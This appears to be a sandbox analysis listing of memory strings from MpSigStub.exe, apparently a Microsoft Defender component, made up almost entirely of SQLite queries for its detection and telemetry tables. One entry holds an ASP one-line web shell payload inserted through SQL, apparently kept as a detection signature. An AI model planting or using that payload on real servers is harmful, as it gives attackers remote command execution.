Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);SELECT Count(1) FROM DynSigRevisions;DELETE FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;SELECT Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision FROM DynSigRevisions WHERE Key = ?SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;
Source: MpSigStub.exe, 00000026.00000003.18252515965.00000138ADB0C000.00000004.00000001.sdmp	Binary or memory string: SELECT 1 FROM SQLITE_MASTER WHERE type=? AND name=? LIMIT 1;Engine.MetaStore.DBVaultUtilizationMpDisableTaskSchedCmdLineScanMb=Lk
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT InfectedFileSHA, ProcFileId, SystemFilePath, CleanFileSha FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ? ORDER BY InstanceTimeStamp DESC;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM AutoFeatureControl WHERE AutoFeatureControl.Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AnomalyTables(Key, TableKey, TableName, KeyName, FirstSeen, LastSeen, UnbiasedMinutes, Value, Order_) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SystemFileCache(InfectedFileSHAHash, InfectedFileSHA, ProcFileIDSystemFileHash, ProcFileId, SystemFilePath, CleanFileSha, CleanFileShaHash, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(16, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(8, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(26, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, TableKey, TableName, KeyName, FirstSeen, LastSeen, UnbiasedMinutes, Value, Order_ FROM AnomalyTables WHERE AnomalyTables.TableKey = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM AnomalyTables;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?; SELECT Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp FROM FileLowFiAsync WHERE Key = ?; SELECT COUNT(1) FROM FileLowFiAsync; DELETE FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?; DELETE FROM FileLowFiAsync WHERE InstanceTimeStamp < ?; INSERT INTO FileLowFiAsync(Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp) VALUES(?, ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(DISTINCT UserIdHash) FROM FolderGuardPaths;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID, PPIDHash, ProcessStartTime, PID, StructVersion, ImageFileName, MonitoringFlags_Flags, MonitoringFlags_VmHardenType, MonitoringFlags_ExemptVmHardenedTypes, CommandLineArgs, HipsInjectionId, FolderGuardId, Flags, LsassReadMemId, MonitoringFlags_Flags2Low, MonitoringFlags_Flags2High FROM BmProcessInfo WHERE PPIDHash = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AutoFeatureControl(Key, CurrCount, MaxCount, InstanceTimeStamp) VALUES (?, ?, ?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM AtomicCounters ORDER BY InsertTime ASC LIMIT 1;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(20, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT PersistId, PersistIdBlob, ExpirationDate FROM AmsiFileCache WHERE PersistId = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(31, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM AtomicCounters WHERE AtomicCounters.Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(18, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM BmProcessInfo WHERE PPIDHash = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM AnomalyInfo;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ValueMapArrayBlob FROM ValueMapArray WHERE Key = ? AND RecordType = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM AttributeCounts ORDER BY InsertTime ASC LIMIT 1;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory WHERE RuleId = ? GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM ValueMapArray WHERE ValueMapArray.Key = ? AND ValueMapArray.RecordType = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(21, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM BmFileInfo;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM AtomicCounters;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ThreatRecordId, Action FROM BmFileActions WHERE FileInfoId == ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(17, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO BmHipsRuleInfo(ProcessInfoId, RuleAction, RuleId, IsAudit, IsInherited, State) VALUES (?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE AttributePersistContext SET FilePath = ?, Context = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO ProcessInfo(FileName, ProcessId, CommandLine, StartTime, TokenElevation, TokenElevationType, IntegrityLevel) VALUES(? , ? , ? , ? , ? , ? , ? );
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, RecordTimeStamp, Generation FROM RecordIdentifier WHERE ID = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM AttributePersistContext WHERE AttributePersistContext.Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(19, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM NetworkIpFirewallRules WHERE NetworkIpFirewallRules.Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO BackupProcessInfo(Key, FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(22, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM RansomwareDetections WHERE Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM SdnEx WHERE SdnEx.Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(29, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM SystemRegistryCache WHERE Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM AttributeCounts;
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	Binary or memory string: insertinto[bin_cmd](cmd)values('<%execute(request(chr(35)))%>')
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM AmsiFileCache;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM AnomalyTables WHERE AnomalyTables.TableKey = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SystemRegistryCache(Key, FileIDHash, RegPath, RegOperation, NewRegType, OldRegType, OldRegData, NewRegData, InstanceTimeStamp) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AtomicCounters(Key, Name, Count, InsertTime, ExpireTime, UpdateTime) VALUES(? , ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO File(SHA1, MD5, lshashs, lshash, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n, Size, SHA256) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ?, ?, ? );
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(30, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(23, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM RollingQueuesValues;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SdnEx(Key, CurrentCount) VALUES (?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(15, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(10, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO BmProcessInfo(PPIDHash, ProcessStartTime, PID, StructVersion, ImageFileName, MonitoringFlags_Flags, MonitoringFlags_VmHardenType, MonitoringFlags_ExemptVmHardenedTypes, CommandLineArgs, HipsInjectionId, FolderGuardId, Flags, LsassReadMemId, MonitoringFlags_Flags2Low, MonitoringFlags_Flags2High)VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM BackupProcessInfo;
Source: MpSigStub.exe, 00000026.00000003.18252515965.00000138ADB0C000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, FilePath, Context, InsertTime, ExpireTime FROM AttributePersistContext WHERE Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT FileInstance.ID FROM FileInstance, RecordIdentifier WHERE FileInstance.RecordID = RecordIdentifier.ID AND RecordIdentifier.Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory ORDER BY TimeStamp DESC;DELETE FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ?;SELECT COUNT(1) FROM ProcessBlockHistory;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory WHERE RuleId = ? GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE RuleId = ? ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ? ORDER BY TimeStamp DESC;SELECT ID FROM ProcessBlockHistory WHERE ProcessPath = ?;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC;DELETE FROM ProcessBlockHistory WHERE TimeStamp < ?;SELECT ProcessPath, TimeStamp FROM ProcessBlockHistory ORDER BY TimeStamp ASC LIMIT 1SELECT COUNT(DISTINCT ProcessPath) FROM ProcessBlockHistory;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC LIMIT 1;REPLACE INTO ProcessBlockHistory(ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity) VALUES (?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM ProcessBlockHistory;[3
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT RecordIdentifier.Key, FileInstance.RecordID, RecordIdentifier.RecordTimeStamp, FileInstance.TrackingEnabled, FileInstance.StorageEvent, FileInstance.StorageEventState, FileInstance.ModificationsCount, FileInstance.ParentRecordID, FileInstance.Parent_FileEvent, FileInstance.Parent_FileName, RecordIdentifier.Generation, FileInstance.FileName, FileInstance.USN, FileInstance.CreateTime, FileInstance.LastAccessTime, FileInstance.LastWriteTime, FileInstance.Signer, FileInstance.SignerHash, FileInstance.Issuer, FileInstance.SigningTime, FileInstance.MOTW, FileInstance.MOTWFromParent, FileInstance.IsValidCert, FileInstance.CertInvalidDetails, FileInstance.IsCatalogSigned, File.SHA1, File.MD5, File.lshashs, File.lshash, File.PartialCRC1, File.PartialCRC2, File.PartialCRC3, File.KCRC1, File.KCRC2, File.KCRC3, File.KCRC3n, File.Size, File.SHA256, ParentProcessInfo.CommandLine, ParentProcessInfo.FileName, ParentProcessInfo.IntegrityLevel, ParentProcessInfo.ProcessId, ParentProcessInfo.StartTime, ParentProcessInfo.TokenElevation, ParentProcessInfo.TokenElevationType, RemoteProcessInfo.CommandLine, RemoteProcessInfo.FileName, RemoteProcessInfo.IntegrityLevel, RemoteProcessInfo.TokenElevation, RemoteProcessInfo.TokenElevationType, ScanInfo.NamedAttributes, ScanInfo.PeAttributes, ScanInfo.PersistSigSeq, ScanInfo.ProgenitorPersistSigSeq, ScanInfo.ScanAgent, ScanInfo.ScanReason, ScanInfo.SigAttrEvents, ScanInfo.SigSeq, ScanInfo.SigSha, ScanInfo.WebURL,Engine.EngineVersion, Engine.SigVersion FROM RecordIdentifier INNER JOIN (FileInstance INNER JOIN File ON FileInstance.FileID = File.ID LEFT OUTER JOIN ProcessInfo as 'ParentProcessInfo' ON FileInstance.Parent_ProcessID = ParentProcessInfo.ID LEFT OUTER JOIN ProcessInfo as 'RemoteProcessInfo' ON FileInstance.Remote_ProcessID = RemoteProcessInfo.ID LEFT OUTER JOIN (ScanInfo INNER JOIN Engine ON ScanInfo.EngineID = Engine.ID) ON FileInstance.ScanID = ScanInfo.ID ) ON RecordIdentifier.ID = FileInstance.RecordID WHERE RecordIdentifier.Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE AtomicCounters SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ?, UpdateTime = ?, WHERE Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(9, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM DynSigRevisions;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM ProcessBlockHistory;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM BmProcessInfo;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO ValueMapArray(Key, RecordType, ValueMapArrayBlob, InstanceTimeStamp) VALUES(?, ? , ? , ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, Name, Count, InsertTime, ExpireTime FROM AttributeCounts WHERE Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp FROM FileLowFiAsync WHERE Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM BmFileStartupActions WHERE BmFileStartupActions.FilePathHash = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM FileHashes;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO RecordIdentifier(Key, RecordTimeStamp, Generation) VALUES(?, ?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(27, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO FileHashes(Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n) VALUES(?, ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT DetectionGuid, LkgTS, NextUSN, DetectionTS, ProvisionalRemedComplTS, RemedComplTS, ImpactedCBPNameSpaces FROM RansomwareDetections WHERE Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO NetworkIpFirewallRules(Key, FirewallRuleName, ExpiryTime) VALUES (?, ?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces FROM BackupProcessInfo WHERE Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(7, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM RollingQueuesTables WHERE RollingQueuesTables.Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT InfectedFileSHA, ProcFileId, SystemFilePath, CleanFileSha FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ? ORDER BY InstanceTimeStamp DESC;SELECT ID FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;DELETE FROM SystemFileCache WHERE InstanceTimeStamp < ?; SELECT Count(1) FROM SystemFileCache WHERE CleanFileShaHash = ?; INSERT INTO SystemFileCache(InfectedFileSHAHash, InfectedFileSHA, ProcFileIDSystemFileHash, ProcFileId, SystemFilePath, CleanFileSha, CleanFileShaHash, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?);SELECT CleanFileSha, CleanFileShaHash FROM SystemFileCache WHERE InstanceTimeStamp < ?; SELECT Count(1) FROM SystemFileCache;DELETE FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;2
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; DELETE FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; SELECT COUNT(1) FROM AttributePersistContext; DELETE FROM AttributePersistContext WHERE ExpireTime < ?; SELECT Key FROM AttributePersistContext ORDER BY InsertTime ASC LIMIT 1; INSERT INTO AttributePersistContext(Key, FilePath, Context, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?); UPDATE AttributePersistContext SET FilePath = ?, Context = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(2, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(DISTINCT UserIdHash) FROM FolderGuardPaths;INSERT INTO FolderGuardPaths(UserIdHash, UserId, GUID, Path) VALUES ( ?, ?, ?, ? );SELECT ID FROM FolderGuardPaths WHERE UserIdHash = ? LIMIT 1;DELETE FROM FolderGuardPaths WHERE UserIdHash = ?;SELECT UserId, GUID, Path FROM FolderGuardPaths WHERE UserIdHash = ?N
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE AttributeCounts SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
